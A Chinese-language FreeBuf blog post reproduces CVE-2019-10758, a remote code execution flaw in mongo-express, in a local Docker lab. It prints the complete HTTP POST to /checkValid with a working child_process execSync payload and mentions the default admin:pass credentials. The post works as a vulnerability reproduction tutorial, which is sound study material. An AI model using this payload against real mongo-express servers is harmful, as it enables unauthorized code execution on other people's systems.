freeBuf
主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

CVE-2019-10758(mongo-express 远程代码执行)漏洞
GuiltyFet 2021-10-25 10:45:09 204237

漏洞描述

mongo-express是一款mongodb的第三方Web界面,使用node和express开发。如果攻击者可以成功登录,或者目标服务器没有修改默认的账号密码(admin:pass),则可以执行任意node.js代码。

漏洞环境

使用docker漏洞环境
漏洞使用,必须root环境
图片.png
环境启动后,访问http://your-ip:8081即可查看到Web页面。
http://127.0.0.1:8081/
图片.png
对首页进行抓包
图片.png
发送到repeater

POST /checkValid HTTP/1.1

Host: 127.0.0.1:8081

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Referer: http://127.0.0.1:8081/

Cookie: hblid=OCkAkPEOWHj8QX5o3m39N0H02BOA0I12; olfsk=olfsk8528760320823083; mongo-express=s%3A-5O4JpzDs7hWHqdrWAHsoAtoP0cyKhbz.3u07nnkJ%2FSmEp21K77ALoB7nB3WhJMe%2FE2qD%2B8fjVWI

If-Modified-Since: Sat, 26 Oct 1985 08:15:00 GMT

If-None-Match: W/"409-7438674ba0"

Content-Type: application/x-www-form-urlencoded

Content-Length: 126



document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("touch /tmp/success")

图片.png

docker ps -a

图片.png

可以看到成功

图片.png

# 渗透测试 # 漏洞分析 # 网络安全技术
本文为 GuiltyFet 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
GuiltyFet LV.4
csdn博客地址GuiltyFet https://blog.csdn.net/weixin_51387754?type=blog 阿里云博客专家
  • 8 文章数
  • 0 关注者
注册ChatGPT详细指南(简单使用)
2022-12-07
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
2022-03-03
Weblogic weak_password
2022-02-23